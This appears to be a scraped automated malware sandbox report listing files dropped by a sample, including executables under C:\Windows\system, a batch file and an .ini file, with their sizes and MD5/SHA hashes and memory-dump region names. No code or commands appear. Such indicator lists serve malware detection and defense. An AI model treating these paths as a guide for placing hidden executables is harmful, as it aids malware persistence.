377d4bc5bf9dc6f87246b0ea81e4a586272a0c041780e9b05a54a31fb064f8fbdf184032ad33b4ccffe4be1f58d8dbd6c910131d20dd228d3d5634a27122456b

Download Submit
C:\1.exe
Filesize
97KB

MD5
3187967732bcd4bbdb12124e9c16dc75

SHA1
ac7767c2f674f8f5667d7015dc60eb498327b959

SHA256
d0ca8abdd78d1c46396e853fa8c0cd0b355212effaaf604306780a19a5d35f4e

SHA512
6cdc0523bf201f3b35da16ede613d137ddb39bd50076d3a9dd22f874663a57780aa3946464d72523b1b3c331dace75030bcd6471387c223f2f1e248364d6e4eb

Download Submit
C:\1.exe
Filesize
97KB

MD5
3187967732bcd4bbdb12124e9c16dc75

SHA1
ac7767c2f674f8f5667d7015dc60eb498327b959

SHA256
d0ca8abdd78d1c46396e853fa8c0cd0b355212effaaf604306780a19a5d35f4e

SHA512
6cdc0523bf201f3b35da16ede613d137ddb39bd50076d3a9dd22f874663a57780aa3946464d72523b1b3c331dace75030bcd6471387c223f2f1e248364d6e4eb

Download Submit
C:\1261.exe
Filesize
41KB

MD5
f16fdd93d49f5fdb990562dc354a7cb4

SHA1
de8c4281576bbb3aa523c335458656b936c08c79

SHA256
91fea5371588d819e54495b2a995850b4617f6eaed7b1e49fdd6f636803e6c71

SHA512
126942eb00d0e57b70bd7faccc4f9ce2ba04d8d59a38c1a525917e507637a84ff8f75eee9e4e2bfc6494aa202d368d14ca5f4b404e67f1a9eac3278da0f1d896

Download Submit
C:\1261.exe
Filesize
41KB

MD5
f16fdd93d49f5fdb990562dc354a7cb4

SHA1
de8c4281576bbb3aa523c335458656b936c08c79

SHA256
91fea5371588d819e54495b2a995850b4617f6eaed7b1e49fdd6f636803e6c71

SHA512
126942eb00d0e57b70bd7faccc4f9ce2ba04d8d59a38c1a525917e507637a84ff8f75eee9e4e2bfc6494aa202d368d14ca5f4b404e67f1a9eac3278da0f1d896

Download Submit
C:\2.exe
Filesize
192KB

MD5
938e52934faf6e925162f6921da82cc6

SHA1
b0bf8d4432286d716183b8b6fa8bd980c2844491

SHA256
dac60d7bd3e25a1db6d78df253521150fcddb229d889f6f67ccadb09c74b0d3f

SHA512
c050d2da20f6b07b28497e521d2f1794165e085990fac097b208558a2bb6ef85abf8a3403f18d96373930cf0940a6512dca3e38831156a93d4826de51c94f131

Download Submit
C:\2.exe
Filesize
192KB

MD5
938e52934faf6e925162f6921da82cc6

SHA1
b0bf8d4432286d716183b8b6fa8bd980c2844491

SHA256
dac60d7bd3e25a1db6d78df253521150fcddb229d889f6f67ccadb09c74b0d3f

SHA512
c050d2da20f6b07b28497e521d2f1794165e085990fac097b208558a2bb6ef85abf8a3403f18d96373930cf0940a6512dca3e38831156a93d4826de51c94f131

Download Submit
C:\Documents and Settings\All Users\hsyhdf16.ini
Filesize
163B

MD5
d371d2d466789b26a76e75b1bfc39a91

SHA1
674b32d5643cca2c9a64f4a79b50afcf908244a1

SHA256
4ad0ba4509683d22c568a1c5e0d781566bc0abb97b587cd12d1cf8b6c159c346

SHA512
29ac8d4080324ba02ee9e591d44c68402e558b374f50c8ef823de5ab7489c4a00dc76f943a8738b83248446db0c25c0ef1459fa8efb0f6c788d2ec1a9ef58d10

Download Submit
C:\Documents and Settings\All Users\hsyhdf16.ini
Filesize
184B

MD5
a75f8b55f74f71383d37795161cf316d

SHA1
6b4369f96001f159d219365d94980c0d20cdc9bf

SHA256
5c80e4056dbfc48f8a26dc1d2a5c2a2b67b7cf5280aefaa86966ef23001e3510

SHA512
1f885cc3b13117beb8eea4cce80c3fde5585fcf3051f4ed96a6189dab270e871e20fd37b8dacbb3c44163c6067ac192ffb911623452233c8e0b71a2a33df1386

Download Submit
C:\Documents and Settings\All Users\hsyhdf16.ini
Filesize
184B

MD5
a75f8b55f74f71383d37795161cf316d

SHA1
6b4369f96001f159d219365d94980c0d20cdc9bf

SHA256
5c80e4056dbfc48f8a26dc1d2a5c2a2b67b7cf5280aefaa86966ef23001e3510

SHA512
1f885cc3b13117beb8eea4cce80c3fde5585fcf3051f4ed96a6189dab270e871e20fd37b8dacbb3c44163c6067ac192ffb911623452233c8e0b71a2a33df1386

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
60KB

MD5
d15aaa7c9be910a9898260767e2490e1

SHA1
2090c53f8d9fc3fbdbafd3a1e4dc25520eb74388

SHA256
f8ebaaf487cba0c81a17c8cd680bdd2dd8e90d2114ecc54844cffc0cc647848e

SHA512
7e1c1a683914b961b5cc2fe5e4ae288b60bab43bfaa21ce4972772aa0589615c19f57e672e1d93e50a7ed7b76fbd2f1b421089dcaed277120b93f8e91b18af94

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
342B

MD5
b4d7fe5fb33a2754b7a608c89431d392

SHA1
119d2d2a45cb4dfbc6b2682bc6d6379868a93ef3

SHA256
c28d17fb1ce54caf9f2eb0d01b43213268210eef89f00aa7f858f1d13a6427b1

SHA512
5bcebb57370d31deb891ea95400c526aabcab71cd66d7c930c68d87e1855839a67999d9573cb742aa954deba250454db22a9a37fdaabc4104c9827123674467a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
242B

MD5
22b854fbf7dd376f7f8a545f1c627d8e

SHA1
4ef0dd4434b217a7da89fcc92f4f73fdc37bfab3

SHA256
f0063701c5e2fb08a7a8c78b736fd101519e861731f6871b31d6b1502214d565

SHA512
1c67ccbccc0ab5ff19d2b63d585b82fc5d9534318de8262a43215510d914bd70ca99f2474e5720a7b853845b244516af1b1b740bfa4e3ebbde00fd67f5d7fea6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\309axvf\imagestore.dat
Filesize
5KB

MD5
fd6c8397e63a0ec540896324894ced5a

SHA1
7b6c957e12c92a483197a6c1ed899f512f049ecc

SHA256
9383b233a48fe5192b7f84bf935c53f7ffc9497bd3b17a6d32bbb05fa568d614

SHA512
41d7849fb13ef9ce7ed1e2498b854db562118edf39c474b6d548562778c4a5d76cecf9d0cb03209c944feeb4e067b6503cd7120c291d0703e2cb1654a45d18e5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\97XWZ59H.txt
Filesize
598B

MD5
3872fa8ce25c1694c447373ca63afcfd

SHA1
2f344fb5f1db2fbd7d22b7efa8c640c3b3565781

SHA256
6a3357afa1ce13c7852a0e0ca16f82849c7ff6b4021c74a3e46115a3654324e4

SHA512
6ae6e640b2ff12ea80324252ee2ce57c68450723976ec6218918aed332190974b8097341c5f487bd0631d7665c43d78eb93aecb7cb26529ea15ae7e65e6ba7e4

Download Submit
C:\Windows\system\zhahss090213.exe
Filesize
72KB

MD5
1e860ee08f069dc4980a573825d3e1dd

SHA1
bd2bbe9fe2c59a800c74a097e67de279ab01c404

SHA256
dd2cdd95d2f57c22310b952ccf3ab316adc0fc589ac0a2e87d27b3262a25af26

SHA512
62cb537d4a8921df905e3ffbbe0cd95dc308f2c24e3bc7d26637e92fd5576d18a643ce969aca544efc4f65ec0a94ce06484f3c5c0365dc2c89fc443d22554bb5

Download Submit
C:\Windows\system\zhahss090213.exe
Filesize
72KB

MD5
1e860ee08f069dc4980a573825d3e1dd

SHA1
bd2bbe9fe2c59a800c74a097e67de279ab01c404

SHA256
dd2cdd95d2f57c22310b952ccf3ab316adc0fc589ac0a2e87d27b3262a25af26

SHA512
62cb537d4a8921df905e3ffbbe0cd95dc308f2c24e3bc7d26637e92fd5576d18a643ce969aca544efc4f65ec0a94ce06484f3c5c0365dc2c89fc443d22554bb5

Download Submit
C:\Windows\system\zhnahsdf090213c.dll
Filesize
29KB

MD5
05634aec0121ce5322471ad951a9f277

SHA1
b7d2bdbf607459b6a6ee4355a3fc2a11e482e51c

SHA256
594875899c54cb89c1c9650038af843d38e1907f24da968f3b4c11c9858756fe

SHA512
266cf75cdc14c85a01101816bd6d8f8fda43dc2ef932df5b6977a832bcfa5da80b8959bd62a93ff5d405174b511ff3473a6c5759520580f0d3db501f0f285ace

Download Submit
C:\tj01.exe
Filesize
45KB

MD5
b0b80b1f78d65d187027bd136af38a60

SHA1
8f5aa9bd50312bffb85a13e462b842da8d15a2ce

SHA256
dc36748dc67d44ae492591d307c2ecd05969a3729a13d5d9a68a4685da4971b0

SHA512
9461c480391305c85bb73b3b7c5be3ae221a22a91ec25bea4215e174cbc1d3c77e526fa45c3baea5fb05cd700137abef4c3dbeeb0792b62c2e194fbd82012c12

Download Submit
C:\tj01.exe
Filesize
45KB

MD5
b0b80b1f78d65d187027bd136af38a60

SHA1
8f5aa9bd50312bffb85a13e462b842da8d15a2ce

SHA256
dc36748dc67d44ae492591d307c2ecd05969a3729a13d5d9a68a4685da4971b0

SHA512
9461c480391305c85bb73b3b7c5be3ae221a22a91ec25bea4215e174cbc1d3c77e526fa45c3baea5fb05cd700137abef4c3dbeeb0792b62c2e194fbd82012c12

Download Submit
C:\xx1215.exe
Filesize
72KB

MD5
1e860ee08f069dc4980a573825d3e1dd

SHA1
bd2bbe9fe2c59a800c74a097e67de279ab01c404

SHA256
dd2cdd95d2f57c22310b952ccf3ab316adc0fc589ac0a2e87d27b3262a25af26

SHA512
62cb537d4a8921df905e3ffbbe0cd95dc308f2c24e3bc7d26637e92fd5576d18a643ce969aca544efc4f65ec0a94ce06484f3c5c0365dc2c89fc443d22554bb5

Download Submit
C:\xx1215.exe
Filesize
72KB

MD5
1e860ee08f069dc4980a573825d3e1dd

SHA1
bd2bbe9fe2c59a800c74a097e67de279ab01c404

SHA256
dd2cdd95d2f57c22310b952ccf3ab316adc0fc589ac0a2e87d27b3262a25af26

SHA512
62cb537d4a8921df905e3ffbbe0cd95dc308f2c24e3bc7d26637e92fd5576d18a643ce969aca544efc4f65ec0a94ce06484f3c5c0365dc2c89fc443d22554bb5

Download Submit
\??\c:\zhqbdf16d.bat
Filesize
48B

MD5
a907130c2404910a21292a30ae8ae565

SHA1
3da22783843ada0cff9476d0cff20d79e151aab4

SHA256
255b709f59fd7388ffbde5be38cbd2e0f448a9ed832a8dc8349821214d6c70c8

SHA512
db172ad930bbdea4f137b09b71313fe12c5415e4568c4a1655e9ab6dc9e7f92bb50acfee67760255b600fc904f8e6af8584b474a1d8dd279ebacbd42cad68fa1

Download Submit
\Windows\system\zhahss090213.exe
Filesize
72KB

MD5
1e860ee08f069dc4980a573825d3e1dd

SHA1
bd2bbe9fe2c59a800c74a097e67de279ab01c404

SHA256
dd2cdd95d2f57c22310b952ccf3ab316adc0fc589ac0a2e87d27b3262a25af26

SHA512
62cb537d4a8921df905e3ffbbe0cd95dc308f2c24e3bc7d26637e92fd5576d18a643ce969aca544efc4f65ec0a94ce06484f3c5c0365dc2c89fc443d22554bb5

Download Submit
\Windows\system\zhahss090213.exe
Filesize
72KB

MD5
1e860ee08f069dc4980a573825d3e1dd

SHA1
bd2bbe9fe2c59a800c74a097e67de279ab01c404

SHA256
dd2cdd95d2f57c22310b952ccf3ab316adc0fc589ac0a2e87d27b3262a25af26

SHA512
62cb537d4a8921df905e3ffbbe0cd95dc308f2c24e3bc7d26637e92fd5576d18a643ce969aca544efc4f65ec0a94ce06484f3c5c0365dc2c89fc443d22554bb5

Download Submit
\Windows\system\zhahss090213.exe
Filesize
72KB

MD5
1e860ee08f069dc4980a573825d3e1dd

SHA1
bd2bbe9fe2c59a800c74a097e67de279ab01c404

SHA256
dd2cdd95d2f57c22310b952ccf3ab316adc0fc589ac0a2e87d27b3262a25af26

SHA512
62cb537d4a8921df905e3ffbbe0cd95dc308f2c24e3bc7d26637e92fd5576d18a643ce969aca544efc4f65ec0a94ce06484f3c5c0365dc2c89fc443d22554bb5

Download Submit
\Windows\system\zhahss090213.exe
Filesize
72KB

MD5
1e860ee08f069dc4980a573825d3e1dd

SHA1
bd2bbe9fe2c59a800c74a097e67de279ab01c404

SHA256
dd2cdd95d2f57c22310b952ccf3ab316adc0fc589ac0a2e87d27b3262a25af26

SHA512
62cb537d4a8921df905e3ffbbe0cd95dc308f2c24e3bc7d26637e92fd5576d18a643ce969aca544efc4f65ec0a94ce06484f3c5c0365dc2c89fc443d22554bb5

Download Submit
\Windows\system\zhnahsdf090213c.dll
Filesize
29KB

MD5
05634aec0121ce5322471ad951a9f277

SHA1
b7d2bdbf607459b6a6ee4355a3fc2a11e482e51c

SHA256
594875899c54cb89c1c9650038af843d38e1907f24da968f3b4c11c9858756fe

SHA512
266cf75cdc14c85a01101816bd6d8f8fda43dc2ef932df5b6977a832bcfa5da80b8959bd62a93ff5d405174b511ff3473a6c5759520580f0d3db501f0f285ace

Download Submit
\Windows\system\zhnahsdf090213c.dll
Filesize
29KB

MD5
05634aec0121ce5322471ad951a9f277

SHA1
b7d2bdbf607459b6a6ee4355a3fc2a11e482e51c

SHA256
594875899c54cb89c1c9650038af843d38e1907f24da968f3b4c11c9858756fe

SHA512
266cf75cdc14c85a01101816bd6d8f8fda43dc2ef932df5b6977a832bcfa5da80b8959bd62a93ff5d405174b511ff3473a6c5759520580f0d3db501f0f285ace

Download Submit
\Windows\system\zhnahsdf090213c.dll
Filesize
29KB

MD5
05634aec0121ce5322471ad951a9f277

SHA1
b7d2bdbf607459b6a6ee4355a3fc2a11e482e51c

SHA256
594875899c54cb89c1c9650038af843d38e1907f24da968f3b4c11c9858756fe

SHA512
266cf75cdc14c85a01101816bd6d8f8fda43dc2ef932df5b6977a832bcfa5da80b8959bd62a93ff5d405174b511ff3473a6c5759520580f0d3db501f0f285ace

Download Submit
\Windows\system\zhnahsdf090213c.dll
Filesize
29KB

MD5
05634aec0121ce5322471ad951a9f277

SHA1
b7d2bdbf607459b6a6ee4355a3fc2a11e482e51c

SHA256
594875899c54cb89c1c9650038af843d38e1907f24da968f3b4c11c9858756fe

SHA512
266cf75cdc14c85a01101816bd6d8f8fda43dc2ef932df5b6977a832bcfa5da80b8959bd62a93ff5d405174b511ff3473a6c5759520580f0d3db501f0f285ace

Download Submit
memory/524-73-0x0000000000000000-mapping.dmp

Download
memory/524-85-0x0000000002C20000-0x00000000036DA000-memory.dmp

Filesize
10.7MB

Download
memory/588-63-0x0000000000000000-mapping.dmp

Download
memory/864-71-0x0000000000000000-mapping.dmp

Download
memory/1140-89-0x0000000000000000-mapping.dmp

Download
memory/1360-129-0x00000000021F0000-0x00000000021F1000-memory.dmp

Filesize
4KB

Download
memory/1372-66-0x0000000000000000-mapping.dmp

Download
memory/1436-86-0x0000000000000000-mapping.dmp

Download
memory/1472-55-0x0000000000000000-mapping.dmp

Download
memory/1524-54-0x0000000075B51000-0x0000000075B53000-memory.dmp

Filesize
8KB

Download
memory/1544-91-0x0000000000000000-mapping.dmp

Download
memory/1684-58-0x0000000000000000-mapping.dmp

Download
memory/1980-94-0x0000000000130000-0x000000000013D000-memory.dmp

Filesize
52KB

Download
memory/1980-80-0x0000000000180000-0x00000000001B4000-memory.dmp

Filesize
208KB

Download
memory/1980-75-0x0000000000000000-mapping.dmp

Download
memory/1980-88-0x0000000000180000-0x00000000001B4000-memory.dmp

Filesize
208KB

Download
memory/1980-93-0x0000000000180000-0x00000000001B4000-memory.dmp

Filesize
208KB

Download
memory/1980-82-0x0000000000130000-0x0000000000164000-memory.dmp

Filesize
208KB

Download
memory/2244-108-0x0000000000180000-0x000000000018D000-memory.dmp

Filesize
52KB

Download
memory/2244-100-0x0000000000000000-mapping.dmp

Download
memory/2248-96-0x0000000000000000-mapping.dmp

Download
memory/2272-99-0x0000000000000000-mapping.dmp

Download
memory/2284-120-0x0000000000000000-mapping.dmp

Download
memory/2352-115-0x0000000000000000-mapping.dmp

Download
memory/2676-110-0x0000000000000000-mapping.dmp

Download